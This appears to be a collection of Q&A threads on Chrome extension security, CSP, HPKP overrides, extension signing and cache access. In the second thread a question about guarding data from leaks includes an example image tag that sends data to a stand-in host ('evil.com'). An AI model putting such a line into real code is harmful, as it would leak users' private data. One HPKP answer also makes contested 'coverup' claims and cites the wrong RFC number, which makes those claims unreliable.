I've got a fairly popular chrome extension, over time I've got sporadic reports from users that this extension is malware, which of course it is not.
I've recently learned that there are malware programs who change the files of the chrome extension and make turn it into a malware.
Is there any way I can defend my extension from this kind of changes?
Thanks.
You don't have to!
Chrome has a built-in mechanism preventing it. Any extension installed from Web Store will have a signed hash of all files included.
At any time when Chrome loads an extension, those hashes are checked, and if any file is modified Chrome marks the extension as potentially compromised, disables it and warns the user of unauthorized changes.
That said, this only protects static files you have in your extension.
If you rely on external scripts, it's your duty to protect them from man-in-the-middle attacks. Chrome's default extension CSP does a good job of securing against the worst offenders, but still - if you use dynamic code, it's your responsibility to secure it, especially if you override the CSP.
Finally, if you're using a Native Host module, it's not secured. Treat it as untrusted.
Related
The background scenario is that I want to give my users a javascript which they can use to analyze their sensitive private data, and I want them to feel safe that this data will not be sent to internet.
Initially, I thought I'll just distribute it as an .html file with embeded <script>, and that they'll just run this .html file in browser over file:/// protocol, which gives some nice same-origin policy defaults.
But, this won't really offer much security to my users: a javascript could easily create an <img src="https://evil.com?sensitive-data=${XYZ}"> tag which would send a GET request to evil.com, despite evil.com being a different origin, because by design embeding of images from different origins is allowed.
Is there some practical way in which I could distribute my javascript and/or for the end user to run such script, so they could be reasonably sure it can't send the data over the internet?
(unpluging the machine from the internet, installing VM, or manipulating firewall settings, are not practical)
(reasonably sure=assumming that the software such us browser they use follows the spec and wasn't hacked)?
Please take a look at Content-Security-Policy subject.
https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/img-src
Supplementing your html by <meta http-equiv="Content-Security-Policy" content="img-src 'self';"> should disallow browser to make requests to foreign resources.
The alternative attempt could be developing your project in the form of a browser extension, where you can set up content security policy quite precisely, including defines of inline scripting, executing string-to-js methods, frames and fonts origin, and so on ( https://developer.chrome.com/docs/apps/contentSecurityPolicy/ )
As a bonus you (and your users) get a free of charge code review from the security departments of the browsers vendors.
Setting up browser proxy in settings to localhost:DUMMY_PORT looks like safe solution for this case.
Deno is, to cite its website:
Deno is a simple, modern and secure runtime for JavaScript and TypeScript that uses V8 and is built in Rust.
Secure by default. No file, network, or environment access, unless explicitly enabled.
So, this reduces the trust of the user to the trust in deno (and to chocolatey if they want to use choco install deno to install deno).
I added HPKP header to my site, but it is not honored by Chrome or Safari. I tested it manually by setting a proxy and by going to chrome://net-internals/#hsts and looking for my domain - which did not found. The HPKP seems correct, and I also tested it using HPKP toolset so I know it is valid.
I am thinking I might be doing something weird with my flow. I have a web app, which is served over myapp.example.com. On login, the app redirects the user to authserver.example.com/begin to initiate OpenID Connect Authorization Code flow. HPKP header is returned only from authserver.example.com/begin, and I think this might be the issue. I have include-subdomain in the HPKP header so I think this is not the issue.
This is the HPKP header (line breaks added for readability):
public-key-pins:max-age=864000;includeSubDomains; \
pin-sha256="bcppaSjDk7AM8C/13vyGOR+EJHDYzv9/liatMm4fLdE="; \
pin-sha256="cJjqBxF88mhfexjIArmQxvZFqWQa45p40n05C6X/rNI="; \
report-uri="https://reporturl.example"
Thanks!
I added HPKP header to my site, but it is not honored by Chrome or Safari... I tested it manually by setting a proxy...
RFC 7469, Public Key Pinning Extension for HTTP, kind of sneaks that past you. The IETF published it with overrides, so an attacker can break a known good pinset. Its mentioned once in the standard by name "override" but the details are not provided. The IETF also failed to publish a discussion in a security considerations section.
More to the point, the proxy you set engaged the override. It does not matter if its the wrong proxy, a proxy certificate installed by an mobile device OEM, or a proxy controlled by an attacker who tricked a user to install it. The web security model and the standard allow it. They embrace interception and consider it a valid use case.
Something else they did was make the reporting of the broken pinset a Must Not or Should Not. It means the user agent is complicit in the coverup, too. That's not discussed in a security considerations section, either. They really don't want folks to know their supposed secure connection is being intercepted.
Your best bet to avoid it is move outside the web security model. Don't use browser based apps when security is a concern. Use a hybrid app and perform the pinning yourself. Your hybrid app can host a WebView Control or View, but still get access to the channel to verify parameters. Also see OWASP's Certificate and Public Key Pinning.
Also see Comments on draft-ietf-websec-key-pinning on the IETF mailing list. One of the suggestions in the comment was change the title to "Public Key Pinning Extension for HTTP with Overrides" to highlight the feature. Not surprisingly, that's not something they want. They are trying to do it surreptitiously without user knowledge.
Here's the relevant text from RFC 6479:
2.7. Interactions with Preloaded Pin Lists
UAs MAY choose to implement additional sources of pinning
information, such as through built-in lists of pinning information.
Such UAs should allow users to override such additional sources,
including disabling them from consideration.
The effective policy for a Known Pinned Host that has both built-in
Pins and Pins from previously observed PKP header response fields is
implementation-defined.
Locally installed CAs (like those used for proxies like you say are running) override any HPKP checks.
This is necessary so as not to completely break the internet given the prevalence of them: anti-virus software and proxies used in large corporations basically MITM https traffic through a locally issued certificate as otherwise they could not read the traffic.
Some argue that locally installing a CA requires access to your machine, and at that point it's game over anyway, but to me this still massively reduces the protection of HPKP and that, coupled with the high risks of using HPKP, means I am really not a fan of it.
Please tell me if the extension was removed (taken down from Chrome Webstore or account was suspended) after 3 months will be it deleted from the Webstore finally? And will be it removed from computers of all users (which previously installed it) or not?
I guess it would depend on how it was removed.
If a developer unpublishes the extension, it is not deleted from Web Store database, and existing installs will continue to exist but no new installs will happen.
If Google catches a malicious extension, it will be, in addition, remotely disabled on users' machines. It's hard to say if it's "deleted" from Web Store or simply unpublished.
Those are the 2 extreme situations. In-between there can be a whole spectrum. If an extension is delisted pending some changes, I'm not sure what happens with existing installs. Google probably explains that when it notifies a developer.
How can I sign my extension so users make sure my extension is safe and it won't steal their information? My extensions needs to access page contents, some users have no good sense of permitting an extension to do so.
Can I sign my extension using a verified sign provider, for example VeriSign?
When you publish an extension to the Chrome Web Store, the only "proof" that users can have of your extension is given by the rating system and the comments of other users. An hypothetical user that wants to install your extension, looks at the ratings and the comments, so make sure that your extensions has a good feedback from its users.
By the way, Google doesn't always look at the internal code of your extension manually, most of the times it only performs some heuristic checks on the code. So the problem is that developers could easily include some malicious code that may not be recognized and that could harm user's privacy in their extension without any problem.
Therefore, due to the Chrome Web Store policy, "validating" your extension is not possible at all. Plus, using SSL servicies (like the one you mentioned) will not make any sense since that your extension's scripts are stored locally.
What you can do is:
Encourage users in rating your extension and leave good feedbacks if they like it.
Redirect users to help links in case of trouble (links like "having trouble?" in your popup and so on).
Write a good worded description, and obviously add some images (or videos, better) to clearly show why an user may find your extension useful.
Always be nice (implied, ahah).
Your extension cannot be signed by an external provider, but it is signed by Chrome Web Store itself.
Every extension has an associated private key used for signing. It ensures consistent extension ID and updates. You can generate one yourself by packaging the extension as CRX (that produces a .pem file) and provide it when publishing on the CWS, or CWS generates it internally when you publish it (and then there's no way to extract it).
From on then, only code signed by this key (by the Web Store engine) will be recognized by Chrome as an update. Furthermore, at least on Windows only CWS-signed packages can be installed.
This security is as strong as the developer's Google account: if it is compromised, CWS will accept an update to your extension, which will be signed with the same key.
Although, as Marco correctly pointed out in his answer, the act of signing something would be just snake oil with respect to security. This signature verifies the identity of the publisher, but nothing more.
There's one more aspect - verified sites. If your extension interacts with a site you control, you can certify this by associating your extension with the site. It will be visible in the Web Store.
CWS-signed packages have an additional warranty of saying "so far, we did not catch this extension breaking any rules". Google can pull the extension off Web Store, and in severe cases blacklist and remove it from all Chrome installs. So that's an additional assurance for the user.
Google runs automated heuristic checks every time you submit your extension, which can trigger manual review. But that's invisible to the user.
That said, make sure to only ask absolute minimum permissions you need. For instance, look into the activeTab permission. It gives full host permissions for a tab when the extension is invoked by the user, but does not result in any permission warning. This was specifically added to address concerns about blanket extension permissions.
Is it possible to access Google Chrome's cache from within an extension?
I'd like to write an extension that loads a cached version of a page when the online one can't be accessed (e.g. Internet connectivity issue).
Updated: I know I could write an NPAPI plugin accessible through an extension to accomplish this but I'd rather not suffer writing one... I am after a solution without resorting to NPAPI, please.
Note: as far as I can tell, Google Chrome doesn't support this functionality (at least not out-of-the-box): I just had an episode of "no Internet access" and I was stranded...
Unfortunately, I'm 99% sure that this is impossible without using an NPAPI in your extension.
Chrome extensions are sandboxed to their own process, and can only access files within the extension's folder.
There is some support for things like chrome://favicon/. But that's about it, at least for now.
Source (Google Chrome Extensions Reference)
P.S. I just had a crazy idea. Extensions only have access to files in their folder... but Chrome stores it's cache in the Cache folder. What you might try is, copy (or move) the Cache folder into a subfolder within the extension. The extension should now be able to access the cache.
Whether this is enough to actually enable offline mode... I don't know. I do see some HTML files (and obviously a lot of images) within my Cache folder, though.
In fact, even without using an extension, I can open up the HTML files in Chrome. And because they're stored on your computer, you should be able to access them even without internet.
P.S. the Cache folder is stored at PATH-TO-CHROME/Default/Cache
P.P.S. there is a way to store an entire webpage and archive it for later use. Check out this extension:
https://chrome.google.com/extensions/detail/mpiodijhokgodhhofbcjdecpffjipkle
Just make a simple plugin manifest that calls an AJAX page which loads jQuery from CDN, and then uses it to parse all the <a> elements on the page and alter the href values to have this prefix: http://webcache.googleusercontent.com/search?q=cache:
So <a href="http://stackoverflow.com/questions/blah"> becomes:
<a href="http://webcache.googleusercontent.com/search?q=cache:http://stackoverflow.com/questions/blah">
VoilĂ , you are cache surfing, but you still need to get to Google. I understand this answer is a bit outside the scope of the question but still solves a lot of web connectivity issues.
I'm tempted to just go write this plugin but I bet it'd be taboo in Google's eyes, so it'd get blocked or removed rather quickly. :)